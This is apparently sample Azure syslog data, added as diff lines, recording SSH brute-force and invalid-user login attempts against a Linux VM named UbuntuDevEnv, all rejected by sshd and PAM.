+13983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:48,UbuntuDevEnv,2019-06-26 04:50:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60282 ssh2,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60282,,
+13984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:51,UbuntuDevEnv,2019-06-26 04:50:51,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 58191 [preauth],1901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,58191,,
+13985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:51,UbuntuDevEnv,2019-06-26 04:50:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60282 ssh2,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60282,,
+13986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:53,UbuntuDevEnv,2019-06-26 04:50:53,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60282 ssh2,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60282,,
+13987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:01,UbuntuDevEnv,2019-06-26 04:50:58,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 60282 ssh2],1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60282,,
+13988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:01,UbuntuDevEnv,2019-06-26 04:51:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60282 ssh2,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60282,,
+13989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:01,UbuntuDevEnv,2019-06-26 04:51:01,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:01,UbuntuDevEnv,2019-06-26 04:51:01,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 60282: Too many authentication failures [preauth],1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,60282,,
+13991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:01,UbuntuDevEnv,2019-06-26 04:51:01,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 60282 ssh2 [preauth],1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60282,,
+13992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:01,UbuntuDevEnv,2019-06-26 04:51:01,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:04,UbuntuDevEnv,2019-06-26 04:51:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:06,UbuntuDevEnv,2019-06-26 04:51:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 1447 ssh2,1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,1447,,
+13995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:19,UbuntuDevEnv,2019-06-26 04:51:19,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 1447: Too many authentication failures [preauth],1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,1447,,
+13996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:19,UbuntuDevEnv,2019-06-26 04:51:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:19,UbuntuDevEnv,2019-06-26 04:51:19,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 1447 ssh2],1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,1447,,
+13998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:19,UbuntuDevEnv,2019-06-26 04:51:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 1447 ssh2 [preauth],1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,1447,,
+13999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:19,UbuntuDevEnv,2019-06-26 04:51:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:22,UbuntuDevEnv,2019-06-26 04:51:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:24,UbuntuDevEnv,2019-06-26 04:51:24,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 7047 ssh2,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:27,UbuntuDevEnv,2019-06-26 04:51:26,auth,UbuntuDevEnv,info,Invalid user ts3srv from 200.6.188.38 port 49942,2048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3srv,200.6.188.3,49942,,
+14003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:27,UbuntuDevEnv,2019-06-26 04:51:26,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 7047 ssh2,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:27,UbuntuDevEnv,2019-06-26 04:51:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,2048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:27,UbuntuDevEnv,2019-06-26 04:51:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:29,UbuntuDevEnv,2019-06-26 04:51:28,auth,UbuntuDevEnv,info,Failed password for invalid user ts3srv from 200.6.188.38 port 49942 ssh2,2048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3srv,200.6.188.3,49942,,
+14007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:29,UbuntuDevEnv,2019-06-26 04:51:28,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 7047 ssh2,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:29,UbuntuDevEnv,2019-06-26 04:51:28,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3srv 200.6.188.38 port 49942 [preauth],2048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3srv,200.6.188.3,49942,,
+14009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:29,UbuntuDevEnv,2019-06-26 04:51:28,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 49942:11: Bye Bye [preauth],2048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,49942,,
+14010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:30,UbuntuDevEnv,2019-06-26 04:51:30,auth,UbuntuDevEnv,info,Invalid user fengjian from 5.135.161.72 port 46384,2062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fengjian,5.135.161.7,46384,,
+14011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:30,UbuntuDevEnv,2019-06-26 04:51:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:30,UbuntuDevEnv,2019-06-26 04:51:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,2062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:32,UbuntuDevEnv,2019-06-26 04:51:31,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 7047 ssh2,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:32,UbuntuDevEnv,2019-06-26 04:51:31,auth,UbuntuDevEnv,info,Failed password for invalid user fengjian from 5.135.161.72 port 46384 ssh2,2062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fengjian,5.135.161.7,46384,,
+14015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:32,UbuntuDevEnv,2019-06-26 04:51:32,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 46384:11: Bye Bye [preauth],2062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,46384,,
+14016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:32,UbuntuDevEnv,2019-06-26 04:51:32,auth,UbuntuDevEnv,info,Disconnected from invalid user fengjian 5.135.161.72 port 46384 [preauth],2062,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fengjian,5.135.161.7,46384,,
+14017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:34,UbuntuDevEnv,2019-06-26 04:51:33,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 7047 ssh2,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 7047 ssh2,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 7047: Too many authentication failures [preauth],2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,7047,,
+14020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 7047 ssh2 [preauth],2032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,7047,,
+14023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,auth,UbuntuDevEnv,info,Invalid user marcos from 119.123.240.8 port 33472,2086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcos,119.123.240.8,33472,,
+14024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:37,UbuntuDevEnv,2019-06-26 04:51:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,2086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+14026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:38,UbuntuDevEnv,2019-06-26 04:51:37,auth,UbuntuDevEnv,info,Invalid user adtomcat from 95.216.195.95 port 41708,2096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adtomcat,95.216.195.9,41708,,
+14027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:38,UbuntuDevEnv,2019-06-26 04:51:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,2096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+14028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:38,UbuntuDevEnv,2019-06-26 04:51:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:38,UbuntuDevEnv,2019-06-26 04:51:37,auth,UbuntuDevEnv,info,Failed password for invalid user marcos from 119.123.240.8 port 33472 ssh2,2086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcos,119.123.240.8,33472,,
+14030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:38,UbuntuDevEnv,2019-06-26 04:51:38,auth,UbuntuDevEnv,info,Disconnected from invalid user marcos 119.123.240.8 port 33472 [preauth],2086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcos,119.123.240.8,33472,,
+14031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:38,UbuntuDevEnv,2019-06-26 04:51:38,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 33472:11: Bye Bye [preauth],2086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,33472,,
+14032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:39,UbuntuDevEnv,2019-06-26 04:51:39,auth,UbuntuDevEnv,info,Failed password for invalid user adtomcat from 95.216.195.95 port 41708 ssh2,2096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adtomcat,95.216.195.9,41708,,
+14033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:39,UbuntuDevEnv,2019-06-26 04:51:39,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 41708:11: Bye Bye [preauth],2096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,41708,,
+14034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:39,UbuntuDevEnv,2019-06-26 04:51:39,auth,UbuntuDevEnv,info,Disconnected from invalid user adtomcat 95.216.195.95 port 41708 [preauth],2096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adtomcat,95.216.195.9,41708,,
+14035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:39,UbuntuDevEnv,2019-06-26 04:51:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:41,UbuntuDevEnv,2019-06-26 04:51:41,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12578 ssh2,2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12578,,
+14037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:45,UbuntuDevEnv,2019-06-26 04:51:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12578 ssh2,2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12578,,
+14038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:47,UbuntuDevEnv,2019-06-26 04:51:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 12578 ssh2,2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12578,,
+14039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:55,UbuntuDevEnv,2019-06-26 04:51:54,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:55,UbuntuDevEnv,2019-06-26 04:51:54,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 12578: Too many authentication failures [preauth],2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,12578,,
+14041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:51:55,UbuntuDevEnv,2019-06-26 04:51:54,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 12578 ssh2 [preauth],2100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,12578,,
